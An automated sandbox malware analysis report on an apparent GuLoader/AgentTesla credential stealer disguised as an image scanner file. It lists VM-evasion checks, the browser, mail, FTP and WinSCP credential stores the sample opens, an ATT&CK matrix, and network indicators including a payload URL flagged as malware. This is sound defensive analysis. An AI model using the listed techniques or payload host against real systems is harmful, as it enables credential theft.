        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dllJump to dropped file
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeMemory allocated: 33840000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeMemory allocated: 33300000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dllJump to dropped file
        Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_0040626D FindFirstFileA,FindClose,2_2_0040626D
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405732
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004026FE FindFirstFileA,2_2_004026FE
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_0040626D FindFirstFileA,FindClose,4_2_0040626D
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405732
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 4_2_004026FE FindFirstFileA,4_2_004026FE
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
        Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002FD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeAPI call chain: ExitProcess graph end nodegraph_2-4668
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeAPI call chain: ExitProcess graph end nodegraph_2-4826
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_6DDA1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_6DDA1A9C
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}Jump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeQueries volume information: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeCode function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031D6
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: Yara matchFile source: 00000004.00000002.24172966883.0000000033875000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jpgcamscanner_20240521_0072345_JPEG.bat.exe PID: 7232, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        12
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        211
        Security Software Discovery
        Remote Services1
        Email Collection
        1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        1
        Disable or Modify Tools
        1
        Credentials in Registry
        12
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        1
        Access Token Manipulation
        Security Account Manager1
        System Network Configuration Discovery
        SMB/Windows Admin Shares2
        Data from Local System
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Process Injection
        NTDS2
        File and Directory Discovery
        Distributed Component Object Model1
        Clipboard Data
        12
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information
        LSA Secrets26
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445937 Sample: jpgcamscanner_20240521_0072... Startdate: 22/05/2024 Architecture: WINDOWS Score: 92 23 ip-api.com 2->23 25 veysiseker.com 2->25 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected GuLoader 2->35 37 2 other signatures 2->37 7 jpgcamscanner_20240521_0072345_JPEG.bat.exe 2 43 2->7         started        signatures3 process4 file5 17 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 7->17 dropped 19 C:\Users\user\AppData\Local\...\System.dll, PE32 7->19 dropped 21 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 7->21 dropped 39 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->39 11 jpgcamscanner_20240521_0072345_JPEG.bat.exe 15 8 7->11         started        15 dllhost.exe 1 7->15         started        signatures6 process7 dnsIp8 27 ip-api.com 208.95.112.1, 59327, 80 TUT-ASUS United States 11->27 29 veysiseker.com 192.250.227.27, 59326, 80 CNSV-LLCUS United States 11->29 41 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->41 43 Tries to steal Mail credentials (via file / registry access) 11->43 45 Tries to harvest and steal ftp login credentials 11->45 47 Tries to harvest and steal browser information (history, passwords, etc) 11->47 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->49 signatures9

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        jpgcamscanner_20240521_0072345_JPEG.bat.exe34%ReversingLabsWin32.Trojan.Guloader
        jpgcamscanner_20240521_0072345_JPEG.bat.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://ip-api.com0%Avira URL Cloudsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
        http://veysiseker.com/FOB.bin100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        ip-api.com
        208.95.112.1
        truetrue
          unknown
          veysiseker.com
          192.250.227.27
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://veysiseker.com/FOB.binfalse
            • Avira URL Cloud: malware
            unknown
            http://ip-api.com/line/?fields=hostingfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nsis.sf.net/NSIS_Errorjpgcamscanner_20240521_0072345_JPEG.bat.exefalse
            • Avira URL Cloud: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorErrorjpgcamscanner_20240521_0072345_JPEG.bat.exefalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ip-api.comjpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            192.250.227.27
            veysiseker.comUnited States
            36454CNSV-LLCUSfalse
            208.95.112.1
            ip-api.comUnited States
            53334TUT-ASUStrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1445937
            Start date and time:2024-05-22 20:12:27 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 15m 21s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
            Run name:Suspected Instruction Hammering
            Number of analysed new started processes analysed:5
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:jpgcamscanner_20240521_0072345_JPEG.bat.exe
            Detection:MAL
            Classification:mal92.troj.spyw.evad.winEXE@4/18@2/2
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:
            • Successful, ratio: 94%
            • Number of executed functions: 138
            • Number of non-executed functions: 71
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Exclude process from analysis (whitelisted): RuntimeBroker.exe, backgroundTaskHost.exe
            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
            • Execution Graph export aborted for target jpgcamscanner_20240521_0072345_JPEG.bat.exe, PID 7232 because it is empty
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • VT rate limit hit for: jpgcamscanner_20240521_0072345_JPEG.bat.exe
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            208.95.112.1h0pYN6vLWWE9A1c.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            DkJr5Ana0qQ1M3U.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            rTTSWIFT_8374783.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            FMC Order No22052468.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            Wire Transfer Payment Copy #18-05-2024.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            DA14680-01F08A92 24K.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • ip-api.com/line/?fields=hosting
            Swift scan.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
            • ip-api.com/json/
            gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
            • ip-api.com/line?fields=query,country
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ip-api.comhttps://link.mail.beehiiv.com/ss/c/u001.CEz1YkosQOgW_2I8tJTUL2rOicXJM7RxHjhrRWDeG5g4TuF3JnRWze3ceZ9WwqET/46i/a2N64yc5RA-IsZ3qpS7tjQ/h6/h001.j_JgYHgZoY9wighPNvNrp_oY-YX91EMEgYGT_rGLcUUGet hashmaliciousUnknownBrowse
            • 51.77.64.70
            h0pYN6vLWWE9A1c.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            DkJr5Ana0qQ1M3U.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            rTTSWIFT_8374783.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            https://www.bing.com/ck/a?!&&p=8ea437cdae831bffJmltdHM9MTcxNTQ3MjAwMCZpZ3VpZD0wZTZlYTYzMC1mOTliLTY4ZWUtMmFlZS1iNWJmZjhiYzY5NDUmaW5zaWQ9NTIwNw&ptn=3&ver=2&hsh=3&fclid=0e6ea630-f99b-68ee-2aee-b5bff8bc6945&psq=yamamotokota.com&u=a1aHR0cHM6Ly95YW1hbW90b2tvdGEuY29tL0hPTUU#ZHVuY2FuLnJlYWRAam9obmxld2lzLmNvLnVrGet hashmaliciousUnknownBrowse
            • 51.77.64.70
            https://www.bing.com/ck/a?!&&p=8ea437cdae831bffJmltdHM9MTcxNTQ3MjAwMCZpZ3VpZD0wZTZlYTYzMC1mOTliLTY4ZWUtMmFlZS1iNWJmZjhiYzY5NDUmaW5zaWQ9NTIwNw&ptn=3&ver=2&hsh=3&fclid=0e6ea630-f99b-68ee-2aee-b5bff8bc6945&psq=yamamotokota.com&u=a1aHR0cHM6Ly95YW1hbW90b2tvdGEuY29tL0hPTUU#ZHVuY2FuLnJlYWRAam9obmxld2lzLmNvLnVrGet hashmaliciousUnknownBrowse
            • 51.77.64.70
            FMC Order No22052468.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            Wire Transfer Payment Copy #18-05-2024.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            DA14680-01F08A92 24K.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
            • 208.95.112.1
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CNSV-LLCUSquotation.docGet hashmaliciousUnknownBrowse
            • 192.250.227.28
            z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
            • 192.250.234.71
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.30974.7732.rtfGet hashmaliciousAgentTeslaBrowse
            • 192.250.227.28
            yZcecBUXN7.exeGet hashmaliciousFormBookBrowse
            • 192.250.235.36
            EMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
            • 192.250.235.36
            n5CCcrkB0Q.exeGet hashmaliciousFormBookBrowse
            • 192.250.235.36
            tee030.docGet hashmaliciousFormBookBrowse
            • 192.250.235.36
            http://www.greenmetrocars.co.uk/Get hashmaliciousUnknownBrowse
            • 192.250.227.23
            https://domesticasia.com/Get hashmaliciousUnknownBrowse
            • 192.250.235.41
            3nDJFXklMW.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 192.250.254.165
            TUT-ASUSh0pYN6vLWWE9A1c.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            DkJr5Ana0qQ1M3U.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
